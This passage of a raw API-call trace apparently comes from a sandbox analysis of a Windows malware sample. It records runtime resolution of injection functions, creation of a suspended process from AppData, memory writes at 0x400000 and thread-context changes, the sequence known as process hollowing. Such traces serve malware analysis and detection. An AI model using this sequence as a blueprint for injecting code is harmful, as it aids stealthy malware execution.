(bitmap=0x52d2230, x=0, y=248, color=0x1eed00) returned 0x0 [0119.289] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.289] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.289] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=249, color=0x1eed00) returned 0x0 [0120.479] CoTaskMemAlloc (cb=0xd) returned 0x4cfb48 [0120.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="kernel32", cchWideChar=8, lpMultiByteStr=0x2737e64, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kernel32", lpUsedDefaultChar=0x0) returned 8 [0120.479] LoadLibraryA (lpLibFileName="kernel32") returned 0x772b0000 [0120.480] CoTaskMemFree (pv=0x4cfb48) [0120.494] CoTaskMemAlloc (cb=0x11) returned 0x45b478 [0120.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ResumeThread", cchWideChar=12, lpMultiByteStr=0x2737e9c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ResumeThread", lpUsedDefaultChar=0x0) returned 12 [0120.494] GetProcAddress (hModule=0x772b0000, lpProcName="ResumeThread") returned 0x772c43a7 [0120.494] CoTaskMemFree (pv=0x45b478) [0120.505] CoTaskMemAlloc (cb=0xd) returned 0x4cfb30 [0120.505] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="kernel32", cchWideChar=8, lpMultiByteStr=0x2737f74, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kernel32", lpUsedDefaultChar=0x0) returned 8 [0120.505] LoadLibraryA (lpLibFileName="kernel32") returned 0x772b0000 [0120.506] CoTaskMemFree (pv=0x4cfb30) [0120.506] CoTaskMemAlloc (cb=0x1a) returned 0x45bd38 [0120.506] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Wow64SetThreadContext", cchWideChar=21, lpMultiByteStr=0x2737fac, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Wow64SetThreadContext", lpUsedDefaultChar=0x0) returned 21 [0120.506] GetProcAddress (hModule=0x772b0000, lpProcName="Wow64SetThreadContext") returned 0x77345933 [0120.506] CoTaskMemFree (pv=0x45bd38) [0120.516] CoTaskMemAlloc (cb=0xd) returned 0x4cfb48 [0120.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="kernel32", cchWideChar=8, lpMultiByteStr=0x2738084, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kernel32", lpUsedDefaultChar=0x0) returned 8 [0120.516] LoadLibraryA (lpLibFileName="kernel32") returned 0x772b0000 [0120.517] CoTaskMemFree (pv=0x4cfb48) [0120.517] CoTaskMemAlloc (cb=0x15) returned 0x45b478 [0120.517] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SetThreadContext", cchWideChar=16, lpMultiByteStr=0x27380bc, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetThreadContext", lpUsedDefaultChar=0x0) returned 16 [0120.517] GetProcAddress (hModule=0x772b0000, lpProcName="SetThreadContext") returned 0x77345933 [0120.517] CoTaskMemFree (pv=0x45b478) [0120.519] CoTaskMemAlloc (cb=0xd) returned 0x4cfb48 [0120.519] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="kernel32", cchWideChar=8, lpMultiByteStr=0x2738184, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kernel32", lpUsedDefaultChar=0x0) returned 8 [0120.520] LoadLibraryA (lpLibFileName="kernel32") returned 0x772b0000 [0120.520] CoTaskMemFree (pv=0x4cfb48) [0120.520] CoTaskMemAlloc (cb=0x1a) returned 0x45bd38 [0120.520] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Wow64GetThreadContext", cchWideChar=21, lpMultiByteStr=0x27381bc, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Wow64GetThreadContext", lpUsedDefaultChar=0x0) returned 21 [0120.520] GetProcAddress (hModule=0x772b0000, lpProcName="Wow64GetThreadContext") returned 0x772e799c [0120.520] CoTaskMemFree (pv=0x45bd38) [0120.523] CoTaskMemAlloc (cb=0xd) returned 0x4cfb48 [0120.523] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="kernel32", cchWideChar=8, lpMultiByteStr=0x2738288, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kernel32", lpUsedDefaultChar=0x0) returned 8 [0120.523] LoadLibraryA (lpLibFileName="kernel32") returned 0x772b0000 [0120.523] CoTaskMemFree (pv=0x4cfb48) [0120.523] CoTaskMemAlloc (cb=0x15) returned 0x45b478 [0120.523] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetThreadContext", cchWideChar=16, lpMultiByteStr=0x27382c0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThreadContext", lpUsedDefaultChar=0x0) returned 16 [0120.524] GetProcAddress (hModule=0x772b0000, lpProcName="GetThreadContext") returned 0x772e799c [0120.524] CoTaskMemFree (pv=0x45b478) [0120.539] CoTaskMemAlloc (cb=0xd) returned 0x4cfb48 [0120.539] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="kernel32", cchWideChar=8, lpMultiByteStr=0x273837c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kernel32", lpUsedDefaultChar=0x0) returned 8 [0120.539] LoadLibraryA (lpLibFileName="kernel32") returned 0x772b0000 [0120.540] CoTaskMemFree (pv=0x4cfb48) [0120.540] CoTaskMemAlloc (cb=0x13) returned 0x45b218 [0120.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VirtualAllocEx", cchWideChar=14, lpMultiByteStr=0x27383b4, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VirtualAllocEx", lpUsedDefaultChar=0x0) returned 14 [0120.540] GetProcAddress (hModule=0x772b0000, lpProcName="VirtualAllocEx") returned 0x772dd980 [0120.540] CoTaskMemFree (pv=0x45b218) [0120.549] CoTaskMemAlloc (cb=0xd) returned 0x4cfb30 [0120.549] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="kernel32", cchWideChar=8, lpMultiByteStr=0x2738470, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kernel32", lpUsedDefaultChar=0x0) returned 8 [0120.549] LoadLibraryA (lpLibFileName="kernel32") returned 0x772b0000 [0120.549] CoTaskMemFree (pv=0x4cfb30) [0120.549] CoTaskMemAlloc (cb=0x17) returned 0x45b478 [0120.549] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteProcessMemory", cchWideChar=18, lpMultiByteStr=0x27384a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteProcessMemory", lpUsedDefaultChar=0x0) returned 18 [0120.549] GetProcAddress (hModule=0x772b0000, lpProcName="WriteProcessMemory") returned 0x772dd9b0 [0120.549] CoTaskMemFree (pv=0x45b478) [0120.558] CoTaskMemAlloc (cb=0xd) returned 0x4cfb48 [0120.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="kernel32", cchWideChar=8, lpMultiByteStr=0x273856c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kernel32", lpUsedDefaultChar=0x0) returned 8 [0120.558] LoadLibraryA (lpLibFileName="kernel32") returned 0x772b0000 [0120.558] CoTaskMemFree (pv=0x4cfb48) [0120.558] CoTaskMemAlloc (cb=0x16) returned 0x45b218 [0120.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ReadProcessMemory", cchWideChar=17, lpMultiByteStr=0x27385a4, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReadProcessMemory", lpUsedDefaultChar=0x0) returned 17 [0120.559] GetProcAddress (hModule=0x772b0000, lpProcName="ReadProcessMemory") returned 0x772dcfa4 [0120.559] CoTaskMemFree (pv=0x45b218) [0120.574] CoTaskMemAlloc (cb=0xa) returned 0x4cfb30 [0120.574] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ntdll", cchWideChar=5, lpMultiByteStr=0x2738664, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ntdll", lpUsedDefaultChar=0x0) returned 5 [0120.574] LoadLibraryA (lpLibFileName="ntdll") returned 0x778c0000 [0120.574] CoTaskMemFree (pv=0x4cfb30) [0120.574] CoTaskMemAlloc (cb=0x19) returned 0x45bd38 [0120.574] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ZwUnmapViewOfSection", cchWideChar=20, lpMultiByteStr=0x2738690, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZwUnmapViewOfSection", lpUsedDefaultChar=0x0) returned 20 [0120.575] GetProcAddress (hModule=0x778c0000, lpProcName="ZwUnmapViewOfSection") returned 0x778dfc70 [0120.575] CoTaskMemFree (pv=0x45bd38) [0120.581] CoTaskMemAlloc (cb=0xd) returned 0x4cfb30 [0120.581] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="kernel32", cchWideChar=8, lpMultiByteStr=0x2738758, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kernel32", lpUsedDefaultChar=0x0) returned 8 [0120.581] LoadLibraryA (lpLibFileName="kernel32") returned 0x772b0000 [0120.582] CoTaskMemFree (pv=0x4cfb30) [0120.582] CoTaskMemAlloc (cb=0x13) returned 0x45b218 [0120.582] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateProcessA", cchWideChar=14, lpMultiByteStr=0x2738790, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateProcessA", lpUsedDefaultChar=0x0) returned 14 [0120.582] GetProcAddress (hModule=0x772b0000, lpProcName="CreateProcessA") returned 0x772c1072 [0120.582] CoTaskMemFree (pv=0x45b218) [0120.631] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\ibeframnk863.exe", nBufferLength=0x105, lpBuffer=0x1ee32c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\ibeframnk863.exe", lpFilePart=0x0) returned 0x33 [0120.701] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\ibeframnk863.exe", cchWideChar=51, lpMultiByteStr=0x1ee504, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\ibeframnk863.exe", lpUsedDefaultChar=0x0) returned 51 [0120.701] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x1ee500, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x8c\x80í", lpUsedDefaultChar=0x0) returned 0 [0120.703] CreateProcessA (in: lpApplicationName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\ibeframnk863.exe", lpCommandLine="", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000004, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x1ee598*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1ee874 | out: lpCommandLine="", lpProcessInformation=0x1ee874*(hProcess=0x24c, hThread=0x244, dwProcessId=0xec0, dwThreadId=0xec4)) returned 1 [0120.713] CoTaskMemFree (pv=0x0) [0120.733] GetThreadContext (in: hThread=0x244, lpContext=0x2738a14 | out: lpContext=0x2738a14*(ContextFlags=0x10002, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x12e9786, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0120.734] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efde008, lpBuffer=0x1ee864, nSize=0x4, lpNumberOfBytesRead=0x1ee8a8 | out: lpBuffer=0x1ee864*, lpNumberOfBytesRead=0x1ee8a8*=0x4) returned 1 [0120.737] VirtualAllocEx (hProcess=0x24c, lpAddress=0x400000, dwSize=0x2f000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0120.738] WriteProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x400000, lpBuffer=0x3a58a90*, nSize=0x200, lpNumberOfBytesWritten=0x1ee8a8 | out: lpBuffer=0x3a58a90*, lpNumberOfBytesWritten=0x1ee8a8*=0x200) returned 1 [0120.749] WriteProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x401000, lpBuffer=0x383d640*, nSize=0x2d200, lpNumberOfBytesWritten=0x1ee8a8 | out: lpBuffer=0x383d640*, lpNumberOfBytesWritten=0x1ee8a8*=0x2d200) returned 1 [0120.809] WriteProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efde008, lpBuffer=0x2738cec*, nSize=0x4, lpNumberOfBytesWritten=0x1ee8a8 | out: lpBuffer=0x2738cec*, lpNumberOfBytesWritten=0x1ee8a8*=0x4) returned 1 [0120.809] SetThreadContext (hThread=0x244, lpContext=0x2738a14*(ContextFlags=0x10002, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x41f180, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, 